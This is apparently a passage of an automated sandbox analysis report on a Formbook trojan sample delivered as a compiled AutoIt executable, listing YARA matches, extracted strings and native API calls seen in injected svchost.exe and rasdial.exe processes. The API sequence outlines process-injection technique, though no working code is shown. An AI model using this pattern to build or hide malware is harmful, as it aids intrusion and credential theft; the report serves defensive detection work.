            Source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: 031215-Revised-01.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 031215-Revised-01.exe, 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bbf011ed-9
            Source: 031215-Revised-01.exe, 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7f1904c6-e
            Source: 031215-Revised-01.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_ffdf8c10-6
            Source: 031215-Revised-01.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_af2234c7-a
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02681957 NtProtectVirtualMemory,1_2_02681957
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026AC1A3 NtClose,1_2_026AC1A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B60 NtClose,LdrInitializeThunk,1_2_03172B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03172DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03172C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031735C0 NtCreateMutant,LdrInitializeThunk,1_2_031735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174340 NtSetContextThread,1_2_03174340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03174650 NtSuspendThread,1_2_03174650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172B80 NtQueryInformationFile,1_2_03172B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BA0 NtEnumerateValueKey,1_2_03172BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BF0 NtAllocateVirtualMemory,1_2_03172BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172BE0 NtQueryValueKey,1_2_03172BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AB0 NtWaitForSingleObject,1_2_03172AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AD0 NtReadFile,1_2_03172AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172AF0 NtWriteFile,1_2_03172AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F30 NtCreateSection,1_2_03172F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F60 NtCreateProcessEx,1_2_03172F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172F90 NtProtectVirtualMemory,1_2_03172F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FB0 NtResumeThread,1_2_03172FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FA0 NtQuerySection,1_2_03172FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172FE0 NtCreateFile,1_2_03172FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E30 NtWriteVirtualMemory,1_2_03172E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172E80 NtReadVirtualMemory,1_2_03172E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EA0 NtAdjustPrivilegesToken,1_2_03172EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172EE0 NtQueueApcThread,1_2_03172EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D10 NtMapViewOfSection,1_2_03172D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D00 NtSetInformationFile,1_2_03172D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172D30 NtUnmapViewOfSection,1_2_03172D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DB0 NtEnumerateKey,1_2_03172DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172DD0 NtDelayExecution,1_2_03172DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C00 NtQueryInformationProcess,1_2_03172C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172C60 NtCreateKey,1_2_03172C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CA0 NtQueryInformationToken,1_2_03172CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CC0 NtQueryVirtualMemory,1_2_03172CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03172CF0 NtOpenProcess,1_2_03172CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173010 NtOpenDirectoryObject,1_2_03173010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173090 NtSetValueKey,1_2_03173090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031739B0 NtGetContextThread,1_2_031739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D10 NtOpenProcessToken,1_2_03173D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03173D70 NtOpenThread,1_2_03173D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D14650 NtSuspendThread,LdrInitializeThunk,6_2_04D14650
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D14340 NtSetContextThread,LdrInitializeThunk,6_2_04D14340
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04D12CA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04D12C70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12C60 NtCreateKey,LdrInitializeThunk,6_2_04D12C60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12DD0 NtDelayExecution,LdrInitializeThunk,6_2_04D12DD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_04D12DF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12D10 NtMapViewOfSection,LdrInitializeThunk,6_2_04D12D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_04D12D30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12EE0 NtQueueApcThread,LdrInitializeThunk,6_2_04D12EE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_04D12E80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12FE0 NtCreateFile,LdrInitializeThunk,6_2_04D12FE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12FB0 NtResumeThread,LdrInitializeThunk,6_2_04D12FB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12F30 NtCreateSection,LdrInitializeThunk,6_2_04D12F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12AD0 NtReadFile,LdrInitializeThunk,6_2_04D12AD0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12AF0 NtWriteFile,LdrInitializeThunk,6_2_04D12AF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04D12BF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12BE0 NtQueryValueKey,LdrInitializeThunk,6_2_04D12BE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_04D12BA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12B60 NtClose,LdrInitializeThunk,6_2_04D12B60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D135C0 NtCreateMutant,LdrInitializeThunk,6_2_04D135C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D139B0 NtGetContextThread,LdrInitializeThunk,6_2_04D139B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12CC0 NtQueryVirtualMemory,6_2_04D12CC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12CF0 NtOpenProcess,6_2_04D12CF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12C00 NtQueryInformationProcess,6_2_04D12C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12DB0 NtEnumerateKey,6_2_04D12DB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12D00 NtSetInformationFile,6_2_04D12D00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12EA0 NtAdjustPrivilegesToken,6_2_04D12EA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12E30 NtWriteVirtualMemory,6_2_04D12E30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12F90 NtProtectVirtualMemory,6_2_04D12F90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12FA0 NtQuerySection,6_2_04D12FA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12F60 NtCreateProcessEx,6_2_04D12F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12AB0 NtWaitForSingleObject,6_2_04D12AB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D12B80 NtQueryInformationFile,6_2_04D12B80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D13090 NtSetValueKey,6_2_04D13090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D13010 NtOpenDirectoryObject,6_2_04D13010
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D13D70 NtOpenThread,6_2_04D13D70
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04D13D10 NtOpenProcessToken,6_2_04D13D10
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BD8FF0 NtDeleteFile,6_2_02BD8FF0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BD8F00 NtReadFile,6_2_02BD8F00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BD8DA0 NtCreateFile,6_2_02BD8DA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BD9090 NtClose,6_2_02BD9090
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_02BD91E0 NtAllocateVirtualMemory,6_2_02BD91E0
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_000DD5EB
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_000D1201
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_000DE8F6
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0007CAF00_2_0007CAF0
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000E20460_2_000E2046
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000780600_2_00078060
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000D82980_2_000D8298
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000AE4FF0_2_000AE4FF
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000A676B0_2_000A676B
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_001048730_2_00104873
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0009CAA00_2_0009CAA0
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0008CC390_2_0008CC39
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000A6DD90_2_000A6DD9
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0008B1190_2_0008B119
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000791C00_2_000791C0
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000913940_2_00091394
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000917060_2_00091706
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0009781B0_2_0009781B
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000779200_2_00077920
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_0008997D0_2_0008997D
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000919B00_2_000919B0
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00097A4A0_2_00097A4A
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00091C770_2_00091C77
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00097CA70_2_00097CA7
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000FBE440_2_000FBE44
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000A9EEE0_2_000A9EEE
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00091F320_2_00091F32
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_013936400_2_01393640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026983631_2_02698363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026812801_2_02681280
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026810CF1_2_026810CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026810D01_2_026810D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026829ED1_2_026829ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026829F01_2_026829F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268FEA31_2_0268FEA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02682E901_2_02682E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026AE7431_2_026AE743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268DF231_2_0268DF23
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268FC7B1_2_0268FC7B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0268FC831_2_0268FC83
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_026965431_2_02696543
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FA3521_2_031FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032003E61_2_032003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314E3F01_2_0314E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E02741_2_031E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C02C01_2_031C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DA1181_2_031DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031301001_2_03130100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031C81581_2_031C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032001AA1_2_032001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F41A21_2_031F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F81CC1_2_031F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D20001_2_031D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031647501_2_03164750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031407701_2_03140770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313C7C01_2_0313C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315C6E01_2_0315C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031405351_2_03140535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032005911_2_03200591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E44201_2_031E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F24461_2_031F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EE4F61_2_031EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FAB401_2_031FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F6BD71_2_031F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313EA801_2_0313EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031569621_2_03156962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320A9A61_2_0320A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031429A01_2_031429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314A8401_2_0314A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031428401_2_03142840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031268B81_2_031268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0316E8F01_2_0316E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03160F301_2_03160F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E2F301_2_031E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03182F281_2_03182F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B4F401_2_031B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031BEFA01_2_031BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03132FC81_2_03132FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEE261_2_031FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140E591_2_03140E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03152E901_2_03152E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FCE931_2_031FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FEEDB1_2_031FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DCD1F1_2_031DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314AD001_2_0314AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03158DBF1_2_03158DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0313ADE01_2_0313ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03140C001_2_03140C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E0CB51_2_031E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03130CF21_2_03130CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F132D1_2_031F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312D34C1_2_0312D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0318739A1_2_0318739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031452A01_2_031452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B2C01_2_0315B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315D2F01_2_0315D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E12ED1_2_031E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320B16B1_2_0320B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0312F1721_2_0312F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317516C1_2_0317516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0314B1B01_2_0314B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EF0CC1_2_031EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031470C01_2_031470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F70E91_2_031F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF0E01_2_031FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF7B01_2_031FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031856301_2_03185630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F16CC1_2_031F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F75711_2_031F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DD5B01_2_031DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032095C31_2_032095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FF43F1_2_031FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031314601_2_03131460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFB761_2_031FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FB801_2_0315FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B5BF01_2_031B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0317DBF91_2_0317DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFA491_2_031FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7A461_2_031F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B3A6C1_2_031B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031DDAAC1_2_031DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03185AA01_2_03185AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031E1AA31_2_031E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031EDAC61_2_031EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031D59101_2_031D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031499501_2_03149950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315B9501_2_0315B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031AD8001_2_031AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031438E01_2_031438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFF091_2_031FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03141F921_2_03141F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFFB11_2_031FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03103FD21_2_03103FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03103FD51_2_03103FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03149EB01_2_03149EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F1D5A1_2_031F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03143D401_2_03143D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031F7D731_2_031F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0315FDC01_2_0315FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031B9C321_2_031B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031FFCF21_2_031FFCF2
